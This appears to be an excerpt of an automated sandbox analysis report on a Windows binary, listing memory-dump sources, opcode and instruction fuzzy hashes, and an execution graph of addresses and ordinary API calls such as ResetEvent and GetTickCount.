                                                                                                                                              • Instruction Fuzzy Hash: 7D218B76408B0A8BD308DF39DD051FB72A2EBD4320F88CB2D9557C7AC9EBB551498782
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: !
                                                                                                                                              • API String ID: 0-2657877971
                                                                                                                                              • Opcode ID: d8e34f04463a2e8c8d6e0f26712e131346625dd68df120e6b4db3f48204ef6dc
                                                                                                                                              • Instruction ID: 16bdee0e86612a811926c2bf73574de9bebbc975125275a7ca3c1b00713cc87a
                                                                                                                                              • Opcode Fuzzy Hash: d8e34f04463a2e8c8d6e0f26712e131346625dd68df120e6b4db3f48204ef6dc
                                                                                                                                              • Instruction Fuzzy Hash: 8B31A832508B468FD308FF7CE8540AA73D1ABC5305F90873DD995CB684EB265A0D8B86
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: g
                                                                                                                                              • API String ID: 0-30677878
                                                                                                                                              • Opcode ID: b3bc30e440425220b5cb759e9786de5b0bc0f27694c412bc8f0c3b3881cd907a
                                                                                                                                              • Instruction ID: 888a9feb61ea163ac1d5b7f52fbc126cf9aa33694086c3463a5a4fdfe9b79c79
                                                                                                                                              • Opcode Fuzzy Hash: b3bc30e440425220b5cb759e9786de5b0bc0f27694c412bc8f0c3b3881cd907a
                                                                                                                                              • Instruction Fuzzy Hash: 41110E311B5A738E9B1DDF7195151CE7BE0EF52364B98ACBDC008CB887CA64B507C285
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: e
                                                                                                                                              • API String ID: 0-4024072794
                                                                                                                                              • Opcode ID: 06b76249509a132431b8b195aecab0675da26bfb4ef3723b3a82f452f53cff82
                                                                                                                                              • Instruction ID: 6f60a61dbadbda8a1fd29f365364ad29efce59333641f304e5a802ce84c5d71a
                                                                                                                                              • Opcode Fuzzy Hash: 06b76249509a132431b8b195aecab0675da26bfb4ef3723b3a82f452f53cff82
                                                                                                                                              • Instruction Fuzzy Hash: 442190620587618BD714EB7CD9A62EBF7E3ABC5314F24893DC5D0C75D4E77A80048B05
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: .
                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                              • Opcode ID: d998bf872235c4ccbfd77ba7ab7c928dce90daf10f6b12dd538b04ebf1c9892e
                                                                                                                                              • Instruction ID: 1d1890f0aa8ad6c7b08441ca03d863a22514b392d76f1985e0ddb65583656438
                                                                                                                                              • Opcode Fuzzy Hash: d998bf872235c4ccbfd77ba7ab7c928dce90daf10f6b12dd538b04ebf1c9892e
                                                                                                                                              • Instruction Fuzzy Hash: 0621652564CB069BC305EE38C8444CE73A2AFD6320F5ACA2DE1E5C7AC5E7798846C385
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e7f802200074e2d1fe5598afb600c99c6c2e8b916ad92d8eb876141b7ec82eb5
                                                                                                                                              • Instruction ID: 2d8ad9203e6f1be00a81984717c97f141acc36742c3b61b742cf0bbd056b171d
                                                                                                                                              • Opcode Fuzzy Hash: e7f802200074e2d1fe5598afb600c99c6c2e8b916ad92d8eb876141b7ec82eb5
                                                                                                                                              • Instruction Fuzzy Hash: 57515936208A178BD71CDF2CD8904AAB3A1FFD5364F658B3EC426879C4D775611ACB81
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cd105c0600f4e1801ac74eda15737c200952563340a8744e9296e3cb222dcb1c
                                                                                                                                              • Instruction ID: 47bb1ed83a40ac57cca98d52b8d87cb8c71b5332b1595cc039e95ad20705bc4e
                                                                                                                                              • Opcode Fuzzy Hash: cd105c0600f4e1801ac74eda15737c200952563340a8744e9296e3cb222dcb1c
                                                                                                                                              • Instruction Fuzzy Hash: 1D41B871058B194BC328EF68998A0BA73E2FBC1329F60CB2ED4D783595D73594068A86
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 19b423d8c719f2abcea18f584954c6928d54d7621db7d79dfb400ba964435a65
                                                                                                                                              • Instruction ID: 52b11b406d4ba4a09d5b6fe9f5b470300f1265f3d0d99f49d5e408afeefe4597
                                                                                                                                              • Opcode Fuzzy Hash: 19b423d8c719f2abcea18f584954c6928d54d7621db7d79dfb400ba964435a65
                                                                                                                                              • Instruction Fuzzy Hash: 7541C97215C70A4FD319EE78D9040AAB3D1EBC6324F209B3EC4D7C7591EA74522AC786
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c848240054b8ff6e0103f82fb94d750f6dfd793f418fda706e21119363ee325c
                                                                                                                                              • Instruction ID: ccaa6788453b73fa548d2d7193bb6362b8134c87cdd7c02f49f023267e3a54ff
                                                                                                                                              • Opcode Fuzzy Hash: c848240054b8ff6e0103f82fb94d750f6dfd793f418fda706e21119363ee325c
                                                                                                                                              • Instruction Fuzzy Hash: 59412331218A068BC31CDE29E8965BB73D1EBD5311F245A2ED8C7C7985DB34A41ACA86
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 690c83fafe84ea9016feed811bc7de2ddba0d32c706349637b1ae262efabf8d4
                                                                                                                                              • Instruction ID: a92144b47e3b07f0307fd11297d8465a2db393691f70e38854761f060169c8a5
                                                                                                                                              • Opcode Fuzzy Hash: 690c83fafe84ea9016feed811bc7de2ddba0d32c706349637b1ae262efabf8d4
                                                                                                                                              • Instruction Fuzzy Hash: DC5123305187468BD305EF2DE9455ABB3E6FFDA304F208A7E84CA87159D731592ACF82
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7f30c1745df9971ee2cc49ce29b21cc527a9ffb96f4b6a9dbb68ba62f9b1e299
                                                                                                                                              • Instruction ID: 2710837707f4a0981366ee86072bef490fd9e4c8a8430ee9ba06e9057c6edf1d
                                                                                                                                              • Opcode Fuzzy Hash: 7f30c1745df9971ee2cc49ce29b21cc527a9ffb96f4b6a9dbb68ba62f9b1e299
                                                                                                                                              • Instruction Fuzzy Hash: 34517B317146428BCB19EF38C4906EA77E2EFD5310F958A3DD49AC7A88DB39A01EC745
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 76473796c64f82061bba3af70b37bf39509c4bfb61a82a2de18903f9d45e920f
                                                                                                                                              • Instruction ID: 92528cbfcfe8632a17c153c87b4673fc6574be37fa6eabe808fdea27476fa5f5
                                                                                                                                              • Opcode Fuzzy Hash: 76473796c64f82061bba3af70b37bf39509c4bfb61a82a2de18903f9d45e920f
                                                                                                                                              • Instruction Fuzzy Hash: AF41547101CA4A8FE32CDF65C8401ADF7E1EF95311F009AEEC9DE96552CBB459868F02
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3595269133a46a0931e68da5262989faf8a6e94a4debab8fc1a68c697e6703a3
                                                                                                                                              • Instruction ID: fe985e96314821bc77b662947ed98d07e689581e122694a2f49318bc0615b765
                                                                                                                                              • Opcode Fuzzy Hash: 3595269133a46a0931e68da5262989faf8a6e94a4debab8fc1a68c697e6703a3
                                                                                                                                              • Instruction Fuzzy Hash: 2801D274668B164FD328DF29C01517A72A1FBC0310BA0977EC4CB47AD9EB39991B8A81

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:8.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:8.6%
                                                                                                                                              Total number of Nodes:2000
                                                                                                                                              Total number of Limit Nodes:162
38081->38082 38083 10089990 __RTDynamicCast 38084 100899cd 38083->38084 38086 100899f1 Mailbox 38083->38086 38087 10075b3e 38084->38087 38088 10075b48 __EH_prolog 38087->38088 38089 100258ac 3 API calls 38088->38089 38090 10075b5a 38088->38090 38089->38090 38090->38086 38091 100b5f90 38092 100b5fd2 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38091->38092 38115 100b62d8 38091->38115 38101 100b5ff2 38092->38101 38093 10025980 2 API calls 38094 100b6995 38093->38094 38095 100b60d7 ResetEvent 38096 100b60ef 38095->38096 38097 100b60fa GetTickCount 38096->38097 38098 100b6116 38097->38098 38099 100b6379 38098->38099 38100 100b6137 38098->38100 38155 10089d40 RtlEnterCriticalSection RtlLeaveCriticalSection 38099->38155 38102 100b617b 38100->38102 38105 100b6225 38100->38105 38101->38095 38178 1006eae0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38102->38178 38106 1006eae0 16 API calls 38105->38106 38105->38115 38109 100b6257 38106->38109 38107 100b61a1 38108 100b61e8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38107->38108 38108->38115 38110 100b629e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38109->38110 38110->38115 38111 100b63a3 38112 100b644a 38111->38112 38113 100b648c 38111->38113 38185 100b4350 91 API calls 38112->38185 38116 100b64c7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38113->38116 38115->38093 
38117 100b651e 38116->38117 38118 100b6534 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38117->38118 38119 100b6564 38118->38119 38121 100b65bd 38118->38121 38120 100b6569 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38119->38120 38119->38121 38120->38121 38122 100b65f2 38121->38122 38123 100b65e1 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38121->38123 38124 100b6602 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38122->38124 38125 100b660f 38122->38125 38123->38122 38124->38125 38154 100b68da 38125->38154 38186 10089d40 RtlEnterCriticalSection RtlLeaveCriticalSection 38125->38186 38127 100b6642 38128 100b671f 38127->38128 38129 100b6671 38127->38129 38130 100258ac 3 API calls 38128->38130 38131 100258ac 3 API calls 38129->38131 38133 100b6724 38130->38133 38138 100b6676 38131->38138 38134 100b673b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38133->38134 38135 100b67e7 38133->38135 38136 100b6763 38134->38136 38139 100b66f8 38135->38139 38140 100b6801 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38135->38140 38143 100298f0 16 API calls 38136->38143 38137 100b682c 38142 100b68b2 38137->38142 38145 100b688a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38137->38145 38146 100b6843 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38137->38146 38138->38139 38187 100298f0 38138->38187 38139->38137 38141 100b6826 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38139->38141 38140->38139 38141->38137 38203 100c1580 55 API calls 38142->38203 38147 100b677e 38143->38147 38149 100b6869 38145->38149 38146->38149 38202 100c12a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 
